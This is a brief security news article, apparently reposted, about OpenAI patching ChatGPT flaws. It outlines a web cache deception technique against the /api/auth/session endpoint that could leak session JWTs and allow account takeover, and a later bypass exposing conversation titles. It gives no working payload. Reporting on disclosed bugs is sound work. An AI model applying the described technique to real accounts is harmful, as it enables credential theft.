OpenAI quickly fixed account takeover bugs in ChatGPT

OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have been exploited to take over accounts.

OpenAI addressed multiple severe vulnerabilities in ChatGPT that could have allowed attackers to take over user accounts and view chat histories.

One of the issues was a “Web Cache Deception” vulnerability reported that could lead to an account takeover by the bug bounty hunter and Shockwave founder Gal Nagli.

The expert discovered the vulnerability while analyzing the requests that handle ChatGPT’s authentication flow. The following GET request caught the attention of the expert:

https://chat.openai[.]com/api/auth/session

“Basically, whenever we login to our ChatGPT instance, the application will fetch our account context, as in our Email, Name, Image and accessToken from the server, it looks like the attached image below” Nagli wrote on Twitter detailing the bug.

The expert explained that to exploit the flaw, a threat actor can craft a dedicated .css path to the session endpoint (/api/auth/session) and send the link to the victim. Upon visiting the link, the response is cached and the attacker can harvest the victim’s JWT credentials and take full control over his account.

Nagli praised the OpenAI security team that quickly addressed the issue by instructing the caching server to not catch the endpoint through a regex.

The bad news is that the mitigation implemented by the company only partially addressed the issue. The researcher Ayoub Fathi discovered that it is possible to bypass authentication targeting another ChatGPT API. An attacker can exploit this bypass technique to access to a user’s conversation titles.

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享